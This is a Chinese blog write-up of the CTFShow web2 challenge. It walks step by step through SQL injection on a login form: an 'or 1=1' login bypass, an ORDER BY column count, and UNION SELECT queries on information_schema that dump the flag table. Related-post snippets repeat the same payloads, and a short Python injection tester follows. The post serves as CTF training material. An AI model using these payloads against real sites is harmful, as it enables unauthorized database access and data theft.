CTFShow-WEB-web2解题过程

最新推荐文章于 2025-03-24 17:16:41 发布
原创 最新推荐文章于 2025-03-24 17:16:41 发布 · 567 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#算法 #sql #web

本题的题目

看到本题的题目,尝试利用万能钥匙进行SQL注入,首先利用burp抓包(抓的数据包是你输入账号密码进行登录的这个包)

一、在username这里进行万能钥匙的注入

username=-admin'or 1=1 --+&password=admin

发现成功登陆,说明注入成功。

二、这时候利用order by 来判断列数,发现order by 3 是它的列数。

username=-admin'or 1=1 order by 3--+&password=admin

三、接下来利用让它报错显示回显点

-admin'or 1=1 union select 1,2,3 --+

 

在2处有回显点

四、接下来输入代码显示它的数据库

username=-admin'or 1=1 union select 1,database(),3 --+&password=admin

得知数据库名为web2后,查询数据库中的表名

username=-admin'or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2'--+&password=admin

很明显,web2中存在两个表,一个是flag,一个是user。既然我们要找flag,我们可以先查看flag这个表。

这时候我们就要输入

username=-admin'or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='web2'and table_name='flag'--+&password=admin

来查看flag表中存在的列名,发现列名只有一个是flag的

五、最后我们查看字段值就可以找到flag了。

username=-admin'or 1=1 union select 1,group_concat(flag),3 from flag--+&password=admin

本过程仅供参考,如有错误请指出

莫思竹
关注
CTFshow_web2
zoixsoadji的博客
02-28 2446
进入题目,发现题目很简单,首先试试万能密码登陆。 登陆成功,接下来使用bp抓包,并且寻找注入点。 找到注入点,接下来看看它的2下面有什么 查到表名为web2的数据库,接下来继续注入,查询字段。 查找到了flag和user两个数据表,接下来查询字段 最后查询字段内容,得到flag 本人萌新,大佬手下留情 >_< ...
CTFshow-WEB入门-PHP特性(持续更新)
feng的博客
01-20 6557
web89 利用intval的这个特性: 非空的数组会返回1,因此利用数组绕过。 web90 两种方式: ?num=4476a ?num=0x117c web91 考察了preg_match的/m模式。 默认的正则开始"^“和结束”$“只是对于正则字符串如果在修饰符中加上"m”,那么开始和结束将会指字符串的每一行:每一行的开头就是"^",结尾就是"$"。 因此?cmd=php%0a1即可 web92 <?php include("flag.php"); highlight_file(__
ctfshow web入门 内网渗透篇
羽的博客
06-26 3682
首先在登录函数中存在doFilter对传入的用户名密码进行过滤,所以很难去注入。再来看下另外一台靶机,因为存在web服务,但是又不能出网所以通过ssh端口映射到本地来。没错,可以用phar,毕竟我们还有个文件上传的功能,后面需要做的就是这么触发phar。没有使用doFilter函数过滤,只是要求了我们传入的参数需要符合email格式。先看下445端口,靶机给我们提供了msf,所以直接用msf打下Samba。在api/index.php中存在一个写文件的功能,假如可以控制。的值,就可以写入一个木马进去。
ctfshow-WEB-web2
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可 在用户名的输入框中输入万能账号a' or true #,密码随便输 登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库 首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输 a' union select 1,2...
CTFshow-web-web2
qq_68581192的博客
10-07 254
获取flag表的字段,输入1’ union select 1, (select group_concat(column_name) from information_schema.columns where table_schema=‘web2’ and table_name=‘flag’) ,3 # 显示如下 发现只有一个字段。获取flag表的数据,1’ union select 1,(select flag from flag),3 # 显示如下。
ctfshow-WEB-web2_ctf
2401_84297618的博客
04-28 781
ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可在用户名的输入框中输入万能账号 a’ or true #,密码随便输登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输。
ctfshow-VIP题目-Web-详细解题思路
01-27
vim临时文件泄露:vim在编辑时会生成一个隐藏的临时文件,当vim非正常关闭时这个文件就会被保留下来,根据题目提示,访问index.php.swp,打开文件看到flag,flag:ctfshow{66a38e7e-2ef8-4114-91cd-b750b64dc7dd}。...
CTFSHOW-WEB入门-命令执行29-32
2301_80024722的博客
01-29 867
【代码】CTFSHOW-WEB入门-命令执行29-32
CTFSHOW-WEB入门-命令执行54-70
2301_80024722的博客
02-02 1064
会读取gzip文件并将其内容输出到标准输出设备。如果文件不是gzip格式,readgzfile会直接从文件中读取内容而不进行解压。这些字符 ‘c’、‘a’ 和 ‘t’ 可以以任意顺序出现,并且它们之间可以有任意字符(包括零个字符)分隔。在Linux下可以在当前目录下执行可执行文件或者命令。运算进行解析,由于这道题的。通过查阅资料可以知道,在。在进行按位取反就可以得到。,那么我们只需要拼接出。进行按位取反可以得到。
精选资源
ctfshow-web41~60-WP
02-21
本篇文章主要关注的是CTFShow中的Web挑战第41至60题的解题思路与技术细节,尤其是题目41中的命令注入攻击。 #### 题目背景与目标 在题目41中,参与者需要分析给定的PHP代码片段,理解其逻辑并找到漏洞所在。目标是...
CTFshowWEB2
精神大火的博客
03-21 1731
该题考察SQL注入漏洞,之前对SQL注入仅有部分了解,通过该题进行复习深入。
ctfshow-web2
HAI_WD的博客
07-24 427
知道这里是sql注入,确认一下是什么类型的闭合。可以知道闭合是单引号闭合,然后查一下显示的位数。这道题很多wp,但是为了完整性还是写一下。然后知道库了之后,锁定一下数据表。
CTF秀web2
天天学安全专属博客
11-20 1231
CTF秀web2,union注入详解
ctfshow web2
m0_63253040的博客
03-12 1860
打开环境是一个登入页面, 题目提示:最简单的SQL注入,那么先试一试万能密码登入 ' or 1=1# 密码随便输 存在回显,直接sql注入 ' or 1=1 order by 3# 正常回显,爆到4时不回显 ' or 1=1 order by 4# 开始爆库名 ,先看看是哪个位置会回显 ' or 1=1 union select 1,2,3# 发现是可以不用输密码的 ' or 1=1 union select 1,database(),3# 得到库...
CTFshow WEB web2
Y1da的博客
04-19 883
CTFshow WEB web2 直接登录发现URL无变化,网页使用POST传递参数,使用Burp抓包 POST / HTTP/1.1 Host: d19be25d-ff35-4fa2-b9c2-957c36215fe4.challenge.ctf.show Content-Length: 21 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://d19be25d-ff35-4fa2-b9c2-957c36215fe
ctfshow WEB web2
最新发布
weixin_68416970的博客
03-24 408
ctfshow WEB web2
ctf.show_web2
Huamang的博客
02-02 879
万能密码回显成功 查询字段数没有回显 那就联合查询union select,从1试到1,2,3发现三个字段,而且回显位置是第二个 所以开始查询表名 1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()# 出现了flag字段,开始查询flag表的字段名 1' union select 1,group_concat(column_name),3 f
CTFSHOW-web-web4
12-27
### CTF SHOW Web 类别挑战资源与解决方案 对于参与CTF SHOW平台上Web类别的挑战,特别是针对`web4`这一具体题目,可以借鉴一些通用的Web安全漏洞利用技巧以及特定于该平台的经验分享。通常情况下,这类挑战会涉及到常见的Web应用程序漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞(LFI/RFI)等。 为了更好地理解和解决这些挑战,可以从以下几个方面入手: #### 学习基础理论和技术 深入理解HTTP协议的工作原理及其请求响应机制是非常重要的。掌握如何通过浏览器开发者工具分析网络流量可以帮助识别潜在的安全问题[^1]。 #### 利用在线学习资源 有许多优质的网站提供了关于Web渗透测试的学习材料和实践环境,例如OWASP Top Ten项目文档,它列举并解释了当前最严重的Web应用风险;还有像PortSwigger Academy这样的平台提供了一系列课程来教授各种类型的Web漏洞挖掘方法。 #### 参考社区讨论和Writeup 加入相关的技术论坛或社交媒体群组,在那里可以看到其他参赛者发布的writeups(解题报告),这对于获取灵感非常有帮助。GitHub上也有很多开源仓库专门收集整理了不同赛事下的高质量writeup链接集合。 ```python import requests def check_sql_injection(url, param): test_payload = "' OR '1'='1" data = {param: test_payload} response = requests.post(url, data=data) if "Welcome" in response.text: print(f"[+] SQL Injection vulnerability detected on parameter '{param}'!") else: print("[-] No SQL Injection found.") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值